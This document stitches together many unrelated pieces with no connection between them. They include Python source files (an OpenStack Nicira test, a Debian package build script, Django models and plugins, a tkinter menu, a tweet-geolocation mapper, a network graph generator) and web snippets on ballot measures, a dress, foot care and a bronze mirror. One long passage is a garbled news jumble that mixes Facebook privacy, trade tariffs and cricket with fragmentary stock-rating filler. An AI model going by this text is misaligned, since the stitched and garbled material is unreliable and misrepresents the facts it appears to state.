# Copyright (c) 2012 OpenStack, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import os import mock import quantum.common.test_lib as test_lib from quantum.tests.unit.nicira import fake_nvpapiclient import quantum.tests.unit.test_db_plugin as test_plugin NICIRA_PKG_PATH = 'quantum.plugins.nicira.nicira_nvp_plugin' class NiciraPluginV2TestCase(test_plugin.QuantumDbPluginV2TestCase): _plugin_name = ('%s.QuantumPlugin.NvpPluginV2' % NICIRA_PKG_PATH) def setUp(self): etc_path = os.path.join(os.path.dirname(__file__), 'etc') test_lib.test_config['config_files'] = [os.path.join(etc_path, 'nvp.ini.test')] # mock nvp api client self.fc = fake_nvpapiclient.FakeClient(etc_path) self.mock_nvpapi = mock.patch('%s.NvpApiClient.NVPApiHelper' % NICIRA_PKG_PATH, autospec=True) instance = self.mock_nvpapi.start() instance.return_value.login.return_value = "the_cookie" def _fake_request(*args, **kwargs): return self.fc.fake_request(*args, **kwargs) instance.return_value.request.side_effect = _fake_request super(NiciraPluginV2TestCase, self).setUp(self._plugin_name) def tearDown(self): self.fc.reset_all() super(NiciraPluginV2TestCase, self).tearDown() self.mock_nvpapi.stop() class TestNiciraBasicGet(test_plugin.TestBasicGet, NiciraPluginV2TestCase): pass class TestNiciraV2HTTPResponse(test_plugin.TestV2HTTPResponse, NiciraPluginV2TestCase): pass class TestNiciraPortsV2(test_plugin.TestPortsV2, NiciraPluginV2TestCase): pass class TestNiciraNetworksV2(test_plugin.TestNetworksV2, NiciraPluginV2TestCase): pass
Can developers game the system with invalid traffic studies? It’s Official! D for Defeated!! Well over $1.5m dollars and counting has been flowing through the PAC laundering machine in support of Irvine City measures B, C & D. Save $250 donation from the veteran’s alliance there isn’t a citizen donation in sight. Who is representing the Citizens of Irvine?
import shutil import subprocess import os import tarfile class Config(object): build = os.path.abspath("build") files = os.path.abspath("files") output = os.path.abspath("output") manifest = os.path.abspath("build/DEBIAN") temp = os.path.abspath("tmp") templates = os.path.abspath("files/DEBIAN") version = "0.1.0" variables = { "architecture": "all", "maintainer": "Falk Garbsch <[email protected]>", "name": "gpdpocket-power", } print "first we cleanup our stuff" config = Config() for rdir in [config.build, config.temp, config.output]: try: print ">> remove %s" % (rdir) shutil.rmtree(rdir) except: pass print "create directories" os.makedirs(config.temp) os.makedirs(config.output) os.makedirs(config.build) os.makedirs(config.manifest) print "copy files" copylist = [ ( 'files/gpd-fan.conf', '/etc/gpd/fan.conf', 0644 ), ( 'files/gpd-fan.py', '/usr/local/sbin/gpd-fan', 0755 ), ( 'files/gpd-fan.service', '/etc/systemd/system/gpd-fan.service', 0644 ), ( 'files/gpd-fan.sh', '/lib/systemd/system-sleep/gpd-fan', 0755 ), ( 'files/tlp', '/etc/default/tlp', 0644 ) ] for src, dst, mode in copylist: print ">> copy (0%o) %s" % (mode, dst) src = os.path.abspath(src) dst = config.build + dst dn = os.path.dirname(dst) if not os.path.isdir(dn): os.makedirs(dn) shutil.copy(src, dst) os.chmod(dst, mode) print "enable systemd service" src = "/etc/systemd/system/gpd-fan.service" dst = config.build + "/etc/systemd/system/basic.target.wants/gpd-fan.service" dn = os.path.dirname(dst) if not os.path.exists(dst): os.makedirs(dn) os.symlink(src, dst) print "create blacklist item" blacklist = config.build + "/etc/pm/config.d/brcmfmac" dn = os.path.dirname(blacklist) if not os.path.isdir(dn): os.makedirs(dn) fp = open(blacklist, "wb") fp.write("SUSPEND_MODULES=\"brcmfmac\"\n") fp.flush() fp.close() print "write control" variables = config.variables variables["version"] = config.version control = open(config.files + "/DEBIAN/control", "rb").read() fp = open(config.manifest + "/control", "wb") fp.write(control.format(**variables)) fp.flush() fp.close() print "constructing script files" for script in ["/postinst", "/postrm", "/preinst", "/prerm"]: print ">> write DEBIAN%s" % (script) filepath = config.manifest + script content = open(config.templates + script, "rb").read() fp = open(filepath, "wb") fp.write(content.replace("__VERSION_CODE__", variables["version"])) fp.flush() fp.close() os.chmod(filepath, 0555) print "building binary package" command = ["fakeroot", "dpkg-deb", "-b", config.build] command.append("%s/%s-%s.deb" % (config.output, variables["name"], variables["version"])) subprocess.call(command) print "done"
Aidan Mattox Beaded Fit-&-flare Cocktail Dress - Fit-and-flare cocktail dress with beaded details. Crewneck. Short sleeves. Concealed back zip. Lined. About 38" from shoulder to hem. Polyester. Dry clean. Model shown is 5'10" (177cm) wearing US size 4.
# -*- coding: utf-8 -*- # # Copyright (C) 2010 Lincoln de Sousa <[email protected]> # Copyright (C) 2010 Gabriel Falcão <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os from glob import glob from ConfigParser import ConfigParser from django.conf import settings from django.core.urlresolvers import reverse from django.utils import simplejson class Plugin(object): name = None description = None js_url = None html_url = None slug = None default = False def to_dict(self): d = { 'name': self.name, 'description': self.description, 'slug': self.slug, 'js_url': self.js_url, 'html_url': self.html_url, 'default': self.default, } return d def to_json(self): return simplejson.dumps(self.to_dict()) @classmethod def fetch_all(cls): plugins = [] files = glob(os.path.join(settings.PLUGINS_DIRECTORY, "*.cfg")) for i in files: fname = os.path.splitext(os.path.basename(i))[0] plugin = cls() cfg = ConfigParser() cfg.read(os.path.abspath(i)) plugin.name = cfg.get('Default', 'name') plugin.slug = fname plugin.description = cfg.get('Default', 'description') plugin.js_url = reverse('plugins-url', kwargs={'path': '%s.js' % fname}) plugin.html_url = reverse('plugins-url', kwargs={'path': '%s.html' % fname}) if cfg.has_option('Default', 'default'): plugin.default = cfg.getboolean('Default', 'default') else: plugin.default = False plugins.append(plugin) return plugins
ACT-IAC would like to express its thanks and appreciation to each of our 2017 sponsors for their support. The contributions provided by these organizations support the unique public-private partnership provided by ACT-IAC and are vital to our ability to provide high quality programs and services throughout the year. The organizations on this list are demonstrating their commitment to a partnership where government and industry are working together towards a more effective and innovative government.
# All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Rename Namespace To Platform Revision ID: 9a18c6fe265c Revises: 046a38742e89 Create Date: 2017-10-12 17:28:17.636938 """ from alembic import op from rally import exceptions # revision identifiers, used by Alembic. revision = "9a18c6fe265c" down_revision = "046a38742e89" branch_labels = None depends_on = None def upgrade(): with op.batch_alter_table("verifiers") as batch_op: batch_op.alter_column("namespace", new_column_name="platform") def downgrade(): raise exceptions.DowngradeNotSupported()
@Isocelesisopod Agreed! Some leave having started to ponder possibilities, at least. It's hard working through all that societal conditioning.
from django.db import models from django.contrib import admin class NullableModel(models.Model): TRUTH_VALUE = True charfield = models.CharField(max_length=100, null=True, blank=True) charfield_2 = models.CharField(max_length=100, null=TRUTH_VALUE) textfield = models.TextField(null=True, blank=True) boolean_false = models.BooleanField(default=True) nullable_boolean = models.NullBooleanField() # We should still report about the following field, but we cannot # determine its name. models.NullBooleanField() class UniqueForModels(models.Model): time = models.DateTimeField() u_date = models.IntegerField(unique_for_date='time') u_month = models.IntegerField(unique_for_month='time') u_year = models.IntegerField(unique_for_year='time') class ParentModel(models.Model): parent = models.ForeignKey('self') class StrModel(models.Model): dummy = models.CharField(max_length=1) def __str__(self): return "__str__ method" def __unicode__(self): return self.dummy class NullBlankModel(models.Model): number = models.IntegerField(blank=True) class BigModel(models.Model): field01 = models.IntegerField() field02 = models.IntegerField() field03 = models.IntegerField() field04 = models.IntegerField() field05 = models.IntegerField() field06 = models.IntegerField() field07 = models.IntegerField() field08 = models.IntegerField() field09 = models.IntegerField() field10 = models.IntegerField() field11 = models.IntegerField() field12 = models.IntegerField() field13 = models.IntegerField() field14 = models.IntegerField() field15 = models.IntegerField() field16 = models.IntegerField() field17 = models.IntegerField() field18 = models.IntegerField() field19 = models.IntegerField() field20 = models.IntegerField() field21 = models.IntegerField() field22 = models.IntegerField() field23 = models.IntegerField() field24 = models.IntegerField() field25 = models.IntegerField() field26 = models.IntegerField() field27 = models.IntegerField() field28 = models.IntegerField() field29 = models.IntegerField() field30 = models.IntegerField() field31 = models.IntegerField() class NoFieldsModel(models.Model): pass class Post(models.Model): title = models.CharField(max_length=100) content = models.CharField(max_length=1000) views = models.PositiveSmallIntegerField() words = models.SmallIntegerField() created = models.DateTimeField(auto_now_add=True) updated = models.DateTimeField(auto_now=True) def __unicode__(self): return self.title class Comment(models.Model): post = models.ForeignKey(Post) url = models.URLField() def __unicode__(self): return self.url class MisorderedMethodsModel(models.Model): dummy = models.CharField(max_length=1) def incorrect_place(self): pass def get_absolute_url(self): pass def __unicode__(self): # This should be swapped with get_absolute_url pass def correct_place(self): pass class Model1(models.Model): dummy = models.CharField(max_length=1) class Meta: verbose_name_plural = 'right' def __unicode__(self): return self.dummy class Model2(models.Model): dummy = models.CharField(max_length=1) def __unicode__(self): return self.dummy class Meta: verbose_name_plural = 'wrong' class Model3(models.Model): class Meta: verbose_name_plural = 'wrong' dummy = models.CharField(max_length=1) def __unicode__(self): return self.dummy class Model4(models.Model): dummy = models.CharField(max_length=1) def __unicode__(self): return self.dummy class Model5(models.Model): dummy = models.CharField(max_length=1) def get_absolute_url(self): return "/" def __unicode__(self): return self.dummy class AbstractModel(models.Model): foo = models.CharField(max_length=1) class Meta: abstract = True class DerivedModel(AbstractModel): bar = models.CharField(max_length=1) class WeirdPrimaryKeyModel(models.Model): primary_key = models.ForeignKey(Model1, primary_key=True) unique_field = models.ForeignKey(Model2, unique=True) not_both = models.ForeignKey(Model3, primary_key=True, unique=False) class ManyToManyModel(models.Model): nullable = models.ManyToManyField(Model2, null=True) blank = models.ManyToManyField(Model3, blank=True) class AdminKlass(admin.ModelAdmin): search_fields = ('nullable',) class Meta: model = ManyToManyModel
Although some industry players have tried to promote the harvesting of "sustainable" palm oil, Richard Walker, Iceland's managing director, said the company did not believe it was viable... Walker's conclusion was stark: "I do not believe such a thing as sustainable palm oil exists.". Over half of products in supermarkets contain palm oil, according to United Kingdom (UK) grocery store chain Iceland, and demand is contributing to deforestation. About 4.49M shares traded or 22.90% up from the average. Rogers Communications Inc. (RCI) has risen 1.45% since April 8, 2017 and is uptrending. 315,800 shares were bought by Polaris Capital Management Llc as the company's stock declined 0.36% with the market. Though the Indigo staff at the Lucknow airport refused to talk about the incident, according to News18, the airline tweeted about the incident on Monday saying: "Rai was offloaded from 6E541 for unruly behaviour". However, in a video posted on social media, Rai alleged he was manhandled by flight staff. The government has ordered an enquiry into the incident. Moreover, Virtus Advisers has 0.11% invested in Monsanto Company ( NYSE : MON ). A total of 3 analysts rate Monsanto ( NYSE : MON ) as follows: 0 "Buy", 3 "Hold" and 0 "Sell". Now it had 95,873 shares held by the institutional investor. Monsanto Company , together with its subsidiaries, provides agricultural products for farmers worldwide.The firm is worth $55.20 billion. Trump has often slammed China's huge surplus in the trade of goods with the United States, which reached $375 billion a year ago, according to U.S. data. It also included medical devices and flat-screen TVs. Trump also warned China that threats to raise tariffs on American agricultural products, in an attempt to hurt a constituency that provided some of his strongest political support, would backfire. About 1.67 million shares traded. Amazon.com, Inc. (NASDAQ:AMZN) has risen 76.78% since April 9, 2017 and is uptrending. The rating was maintained by BMO Capital Markets with "Outperform" on Monday, May 15. Susquehanna maintained the shares of INTC in report on Friday, March 2 with "Buy" rating. The rating was maintained by SunTrust with "Buy" on Monday, October 2. But even those transactions drew regulator's ire as the conventional RBI was against providing a board position for Enam founder Vallabh Bhanshali. This will mean that Sharma, who had taken charge at the bank on June 1, 2009 (she moved from ICICI Prudential Life Insurance Company where she was the CEO & managing director), will exit Axis almost 30 months ahead of her stipulated tenure. The US Treasury on Friday included Rusal and seven other Deripaska-linked firms in a list of 12 Russian companies hit with sanctions that it said were meant to punish the country for actions in Crimea, Ukraine and Syria, and attempting to subvert Western democracies. The Super Kings won the match by just one wicket much to the delight of the fans of the Yellow Army. The telecom service providers have increased data cap around multiple data plans while smartphone makers have announced partnership with IPL teams to promote their brands. Russia will not leave new United States sanctions and any future hostile actions without a tough response, the Russian Foreign Ministry has said after Washington announced a new round of restrictions against Moscow. "This included their occupation of Crimea, instigation of violence in eastern Ukraine, support for the Assad regime in Syria... and ongoing malicious cyber-activity", the senior official said. A remote Saskatchewan intersection where a junior hockey team bus crashed on Friday was already a scene of tragedy for a family that lost six of its members in a collision two decades ago. "We need to grieve, we need to support each other, we need to appreciate the contributions these young people have made already and grieve the fact that they won't continue to make a contribution", says Dr. Facebook has been scrambling for weeks in the face of the disclosure of the hijacking of private data by the British consulting group working for Donald Trump 's 2016 presidential campaign. We've reached out to AggregateIQ and Facebook , and will update if we hear back. "When you're building something like Facebook that is unprecedented in the world, there are going to be things that you mess up", Zuckerberg said, adding that the important thing was to learn from mistakes. The court acquitted all the other accused - actors Saif Ali Khan , Tabu, Neelam and Sonali Bendre; and Dushyant Singh , a resident of the area. Hundreds flocked to his home in Mumbai to show solidarity with the star who moved from his luxury apartment to sleeping on the floor of a cell in the Jodhpur Central Jail. On March 23, the Indian government had requested the Chinese authorities to facilitate Mr. Nirav Modi's arrest in connection with the ongoing probe against him. The LoU are a sort of guarantee given by an issuing bank to other Indian banks having branches overseas to issue a short-term credit to the applicant. Premier Notley said Albertans have been clear - they want the pipeline built. "Those are strong words, but we need more", Notley said. But she added that this pipeline is so important to Alberta that the province would consider becoming a co-owner. Usa Fincl Portformulas holds 0.19% or 6,309 shs. The stock experienced -0.16% slump, arriving at $145.71 on 04/03/2018. Virginia Retirement Et Al, a Virginia-based fund reported 78,600 shs. Thrivent Financial For Lutherans grew its position in MSCI by 2.0% during the 4th quarter. MSCI outperformed the S&P 500 by 47.88%. Analysts await MSCI Inc . A round of leadership staffing decisions are expected to be made for the German bank in a supervisory board conference call on Sunday. Commenting on the new chief executive, Mr Achleitner said: "In his more than 25 years at Deutsche Bank, Christian Sewing has proven himself a strong and disciplined leader". A reading between 0 and -20 would indicate an overbought situation. Tracking other technical indicators, the 14-day RSI is presently standing at 49.13, the 7-day sits at 52.8, and the 3-day is resting at 55.76 for ETFS S&P 500 High Yield Low Volatility ETF (ZYUS.AX). Kochhar was questioned for six hours on Thursday in connection with the preliminary enquiry against his brother, Deepak Kochhar , and Videocon Chairman Venugopal Dhoot . Rajiv Kochhar is the founder of the Singapore-based Avista Advisory Group. According to disclosures made by Avista Advisory, the company acted as an advisor in restructuring debt of Jaiprakash Associates, Jaiprakash Power Ventures, GTL Infrastructure, Suzlon, JSL and Videocon Group. Michael Chiesa is no stranger to hyping up his UFC fights - he famously took a run at Kevin Lee during a press conference over "your mum" insults past year - but even he was stunned by the attack on a bus carrying him and several MMA stars on Thursday. At the start of the week, the USA announced plans to put tariffs on $50 billion in goods imported from China, and the Chinese government responded with measures of equal size. Over the course of the day 9,408 shares traded hands, as compared to an average volume of 3,770 over the last 30 days for Horizons S&P 500 Covered Call ETF (NYSEARCA:HSPX). Australia is investigating Facebook over alleged privacy breaches, authorities said Thursday, after the firm admitted the personal data of thousands of local users was improperly shared with a British political consultancy. Cambridge Analytica disputed the number in a statement, saying, "Cambridge Analytica licensed data for no more than 30 million people from GSR, as is clearly stated in our contract with the research company". She added that Facebook believed Cambridge Analytica deleted users' data because "they gave us assurances, and it wasn't until other people told us it wasn't true". He is to appear before a USA congressional panel next week to address privacy issues. 'We have a responsibility to protect people's data. "We cared about privacy all along, but I think we got the balance wrong", Sandberg told Savannah Guthrie on the Today show. Facebook is trying to strengthen its system ahead of this year's US midterm elections as well as upcoming elections around the world. " said Facebook in a statement to TechCrunch ". Instead, he said that the move is aimed primarily at stopping external organisations from spreading disinformation as happened in the 2016 United States presidential election and the Brexit referendum the same year. The two sides also will discuss ways to ease tensions in bilateral relations and strengthen political, economic, security and counter-terrorism cooperation. Pakistan rejected as "baseless" the allegation that it violated Afghan airspace. Although the suspension in U.S. aid has been in effect for months, the Pentagon and the U.S. A 67-year-old man from Sydney was charged with four "serious" assault offences allegedly perpetrated against his new wife, who recently arrived in Australia from China. After the incident, the boyfriend reportedly ran to his uncle's home on East Cecil Street and told him what had just happened. Three days later, she again called 911 telling dispatchers that she did not feel right. The company exchanged hands with 17812227 shares contrast to its average daily volume of 15.74M shares. China imposed $3 billion of tariffs on USA farm goods and other exports, bringing the world's two leading economies closer to a full-on trade conflict. Wallington Asset Management Llc who had been investing in American Tower Corp. for a number of months, seems to be bullish on the $61.41 billion market cap company. 6 are the (NASDAQ:GLNG)'s ratings reports on April 6, 2018 according to StockzIntelligence Inc. Cowen increased their price objective on Golar LNG to $49.00 and gave the stock an "outperform" rating in a research note on Wednesday, February 28th. For the full medal count breakdown head over to the Gold Coast 2018 commonwealth games website . Before Sanjita it was Mirabai (Women's 48kg Final) and Gururaja (Men's 56kg Final) who brought cheers to the whole nation as they claimed gold and silver medals respectively. MSCI's broadest index of Asia-Pacific shares outside Japan rose 0.5%, a day after it hit its lowest in nearly two months. Singapore's Straits Times index was down 0.8 percent. Optimists also argued that the global economy is now running so strong that it could cope with the impact of the proposed tariffs, which cover a fraction of the world's trade. In a rare interview conference call with journalists, Mr Zuckerberg admitted that both he and his company have consistently got it wrong when it comes to assessing the damage that is being done by those man- ipulating Facebook for their own ends. Wellington Management Group Llp, which manages about $452.59B US Long portfolio, upped its stake in South St Corp (NASDAQ:SSB) by 318,941 shares to 1.95M shares, valued at $169.71M in 2017Q4, according to the filing. Efg Asset Mngmt (Americas) reported 8,276 shares stake. Investors sentiment increased to 1.11 in Q4 2017. It is positive, as 33 investors sold FIS shares while 191 reduced holdings. Facebook (NASDAQ:FB) last issued its quarterly earnings data on Wednesday, January 31st. (NASDAQ:FB) or 1.65M shares. Moreover, Partner Fund Mngmt L P has 0.02% invested in Facebook, Inc . On Thursday , November 5 the stock rating was maintained by Jefferies with " Buy ". (NASDAQ:FB) on Wednesday, January 31 with " Buy " rating. (NASDAQ:FB) has " Buy " rating given by Mizuho.
__author__ = 'saintdragon2' #http://www.tutorialspoint.com/python/tk_menu.htm from tkinter import Tk, Menu, Toplevel, Button from tkinter.filedialog import askopenfilename from tkinter.messagebox import showerror def donothing(): filewin = Toplevel(root) button = Button(filewin, text="Do nothing button") button.pack() def load_file(): fname = askopenfilename(filetypes=(("Template files", "*.tplate"), ("HTML files", "*.html;*.htm"), ("All files", "*.*") )) if fname: try: # print("""here it comes: self.settings["template"].set(fname)""") print(fname) except: # <- naked except is a bad idea showerror("Open Source File", "Failed to read file\n'%s'" % fname) return root = Tk() menubar = Menu(root) filemenu = Menu(menubar, tearoff=0) filemenu.add_command(label='New', command=donothing) filemenu.add_command(label='Open', command=load_file) filemenu.add_command(label='Save', command=donothing) filemenu.add_command(label='Save as ...', command=donothing) filemenu.add_command(label='Close', command=donothing) filemenu.add_separator() filemenu.add_command(label='Exit', command=root.quit) menubar.add_cascade(label='File', menu=filemenu) editmenu = Menu(menubar, tearoff=0) editmenu.add_command(label='Undo', command=donothing) editmenu.add_separator() editmenu.add_command(label='Cut', command=donothing) editmenu.add_command(label='Copy', command=donothing) editmenu.add_command(label='Paste', command=donothing) editmenu.add_command(label='Delete', command=donothing) editmenu.add_command(label='Select All', command=donothing) menubar.add_cascade(label='Edit', menu=editmenu) helpmenu = Menu(menubar, tearoff=0) helpmenu.add_command(label='Help Index', command=donothing) helpmenu.add_command(label='About ...', command=donothing) menubar.add_cascade(label='Help', menu=helpmenu) root.config(menu=menubar) root.mainloop()
Today was supposed to be Aulia's swimming class at the Oakleaf Country Club but the coach cancelled it after the first 5 minutes. The rain gotten heavier which wasn't so bad but then there was thunder and lightning so we had to literally drag her out of the water: poor thing! So we decided to go back home and continue sleeping. Oh well, guess there's always next week. Will share her swimming lesson on my next post..
import simplekml import json import datetime import csv from bson.code import Code from pymongo import MongoClient from math import radians, cos, sin, asin, sqrt from random import choice import operator import csv def haversine(lon1, lat1, lon2, lat2): """ Calculate the great circle distance between two points on the earth (specified in decimal degrees) """ # convert decimal degrees to radians lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2]) # haversine formula dlon = lon2 - lon1 dlat = lat2 - lat1 a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2 c = 2 * asin(sqrt(a)) km = 6367 * c return km def closest_negighbor(geo_dict): data = {} if geo_dict['n_loc'] == 1: data['user'] = geo_dict['user'] data['loc'] = geo_dict['location'][0] elif geo_dict['n_loc'] == 2: data['user'] = geo_dict['user'] data['loc'] = choice(geo_dict['location']) elif geo_dict['n_loc'] > 2: pt_dict = {} for i in range(len(geo_dict['location'])): distance_list = [] for j in range(len(geo_dict['location'])): distance = haversine(geo_dict['location'][i][0],geo_dict['location'][i][1],geo_dict['location'][j][0],geo_dict['location'][j][1]) distance_list.append(distance) pt_dict[i] = reduce(lambda x, y: x + y, distance_list) / len(distance_list) data['user'] = geo_dict['user'] data['loc'] = geo_dict['location'][max(pt_dict.iteritems(), key=operator.itemgetter(1))[0]] else: return data data['n_loc'] = geo_dict['n_loc'] return data def map_points(input_file): geo_stuff = tw_spanish.map_reduce(mapper,reducer, "results") #print geo_stuff count = 0 geo_dict = {} with open('./testmap_spanish_user.csv', 'wb') as csvfile: mapwriter = csv.writer(csvfile) mapwriter.writerow(['user','latitude','longitude','n_loc']) for doc in geo_stuff.find(): geo_dict['user'] = doc['_id']['user'] value = doc['value'] if 'Geo' in value: geo_dict['location'] = [value['Geo']] geo_dict['n_loc'] = 1 elif 'Geo_list' in value: geo_dict['location'] = value['Geo_list'] geo_dict['n_loc'] = value['n_pts'] geo_data = closest_negighbor(geo_dict) if geo_data != {}: mapwriter.writerow([geo_data['user'],geo_data['loc'][0],geo_data['loc'][1], geo_data['n_loc']]) print geo_data count += 1 print count # f = open(input_file, "r" ) # with open('./testmap_spanish.csv', 'wb') as csvfile: # mapwriter = csv.writer(csvfile) # mapwriter.writerow(['time','latitude','longitude']) # for each in f: # tmp = each.split('\t') # time = datetime.datetime.strptime(tmp[0][0:-5], '%Y-%m-%dT%H:%M:%S') # geo = tmp[1].strip().split(', ') # #print time, geo # row = [] # row.append(time) # row.append(geo[0]) # row.append(geo[1]) # try: # mapwriter.writerow(row) # except: # mapwriter.writerow([unicode(s).encode("utf-8") for s in row]) if __name__ == '__main__': client = MongoClient() db = client.twitter_test tw_spanish = db.spanish_tweets mapper = Code("""function () { emit({user:this.actor.id},{Geo: this.geo.coordinates}); } """ ) reducer = Code("""function(key,values) { var list = []; var count = 0; values.forEach(function(value) { if(value.Geo){ list.push(value.Geo); count+=1; } }) return {Geo_list:list, n_pts:count}; } """ ) ifile = './output.txt' map_points(ifile)
Contemporary mirror, sculpted in bronze. The top surface changes lightly from ruff to polished, resulting in a worn effect. This, in combination with the earthy colours makes this a remarkable item. Part of the Synthesis Monolith serie. When confronted with things that exceeds our very understanding, our inability to categorise and relate to them commands our full attention. The Monolith is a mysterious extraterrestrial artefact of unknown origin and nature. Its aesthetic concept touches upon the divine, the omnipotent, indefinable creator of human civilisation. The future is a place where the complexity of both natural and technical processes can converge. This convergence will usher in a new aesthetic paradigm where objects are created to inspire awe and present a mystical form in which both naturally grown and machine-processed materials and textures seamlessly coexist. At first glance, these objects are naturally formed. Upon closer examination, traces of technology reveal their mystical purpose, to encourage a new perception that oscillates between a sense of the natural and the technological--and the fleeting illusion of their convergence.
# Copyright 2019 TWO SIGMA OPEN SOURCE, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from IPython import get_ipython from IPython.core.magic import (magics_class, cell_magic, Magics) from beakerx_magics import KernelMagics from ipykernel.zmqshell import ZMQInteractiveShell @magics_class class KernelRunnerMagic(Magics): kernels = {} def __init__(self, shell): super(KernelRunnerMagic, self).__init__(shell) @cell_magic def kernel(self, line, cell): if line not in self.kernels: km = KernelMagics(self.shell) km.start(line) self.kernels[line] = km return self.kernels[line].run_cell(line, cell) def load_ipython_extension(ipython): if isinstance(ipython, ZMQInteractiveShell): ipython.register_magics(KernelRunnerMagic) if __name__ == '__main__': ip = get_ipython() ip.register_magics(KernelRunnerMagic)
As chiropodists and podiatrists, we are always asked for our top tips when it comes to looking after feet. Here we have included a few for you to try. Go on……give your feet a treat! It doesn’t have to be a really expensive moisturiser, but the best results are usually seen with creams that include products such as Vitamin E and Urea. The key is applying it little and often. It will not stop your hard skin altogether but should stop the build up irritating you as quickly. Use a pumice stone or rough emery board to maintain soft feet temporarily after a chiropody treatment. Although it is wise to avoid using a pumice stone on verrucaes as this could spread them. Avoid the temptation to cut down the sides. If you are experiencing pain, see a chiropodist for advice. The reason we advise not cutting down the side is as well as risking making the problem worse, you can introduce infection to the sides of your nail. All our instruments are sterile so if it is really necessary to cut down the sides, this is a much safer way of rectifying the problem. It’s not that heels are always a no-no but just ensure that the toe box is deep enough to wiggle your toes and that they are not pinching at the edges of your feet. Ideally, soft flat lace up shoes are the best as then when the feet swell over the course of a day, the laces can be slackened to accommodate the expansion in the foot. See a chiropodist regularly for general maintenance and straight away should you have any concerns over your foot or leg health.
#!/usr/bin/python -u # # Copyright (c) 2016 Balazs Nemeth # # This file is free software: you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This file is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with POX. If not, see <http://www.gnu.org/licenses/>. import importlib import random import string from sg_generator import NameGenerator from generator import NFFG def get_networkx_func (func_name, seed=0, **kwargs): """ Uses 'func_name' graph generator of NetworkX library to create a NetworkX graph which can be used as topology. """ nx_func = getattr(importlib.import_module("networkx"), func_name) generated_graph = nx_func(seed=seed, **kwargs) return generated_graph def networkx_resource_generator (func_name, seed=0, max_cpu=40, max_mem=16000, max_storage=30, max_link_bw=70, abc_nf_types_len=10, supported_nf_cnt=6, max_link_delay=2, sap_cnt=10, **kwargs): """ Uses a NetworkX graph to create a request NFFG. :param func_name: string of NetworkX lib's random graph generator function name :param seed: :param max_cpu: :param max_mem: :param max_storage: :param max_link_bw: :param abc_nf_types_len: :param supported_nf_cnt: :param max_link_delay: :param sap_cnt: :param kwargs: :return: """ rnd = random.Random() rnd.seed(seed) nx_graph = get_networkx_func(func_name, seed=seed, **kwargs) nf_types = list(string.ascii_uppercase)[:abc_nf_types_len] nffg = NFFG(id="net-" + func_name + "-seed" + str(seed)) gen = NameGenerator() for infra_id in nx_graph.nodes_iter(): infra = nffg.add_infra(id=infra_id, bandwidth=rnd.random() * max_link_bw * 1000, cpu=rnd.random() * max_cpu, mem=rnd.random() * max_mem, storage=rnd.random() * max_storage) infra.add_supported_type(rnd.sample(nf_types, supported_nf_cnt)) for i, j in nx_graph.edges_iter(): infra1 = nffg.network.node[i] infra2 = nffg.network.node[j] nffg.add_undirected_link(port1=infra1.add_port(id=gen.get_name("port")), port2=infra2.add_port(id=gen.get_name("port")), p1p2id=gen.get_name("link"), p2p1id=gen.get_name("link"), dynamic=False, delay=rnd.random() * max_link_delay, bandwidth=rnd.random() * max_link_bw) infra_ids = [i.id for i in nffg.infras] for s in xrange(0, sap_cnt): sap_obj = nffg.add_sap(id=gen.get_name("sap")) sap_port = sap_obj.add_port(id=gen.get_name("port")) infra_id = rnd.choice(infra_ids) infra = nffg.network.node[infra_id] nffg.add_undirected_link(port1=sap_port, port2=infra.add_port(id=gen.get_name("port")), p1p2id=gen.get_name("link"), p2p1id=gen.get_name("link"), dynamic=False, delay=rnd.random() * max_link_delay, bandwidth=rnd.uniform(max_link_bw / 2.0, max_link_bw)) return nffg def networkx_request_generator (func_name, seed=0, max_cpu=4, max_mem=1600, max_storage=3, max_link_bw=7, abc_nf_types_len=10, max_link_delay=2, sap_cnt=10, **kwargs): rnd = random.Random() rnd.seed(seed) nx_graph = get_networkx_func(func_name, seed=seed, **kwargs) nf_types = list(string.ascii_uppercase)[:abc_nf_types_len] nffg = NFFG(id="req-" + func_name + "-seed" + str(seed)) nffg.mode = NFFG.MODE_ADD for nf_id in nx_graph.nodes_iter(): nf = nffg.add_nf(id=nf_id, func_type=rnd.choice(nf_types), cpu=rnd.random() * max_cpu, mem=rnd.random() * max_mem, storage=rnd.random() * max_storage) for i, j in nx_graph.edges_iter(): """TODO: How to direct the randomly generated graph's edges.""" pass return nffg if __name__ == "__main__": print networkx_resource_generator("erdos_renyi_graph", seed=5, n=6, p=0.3, sap_cnt=15).dump()
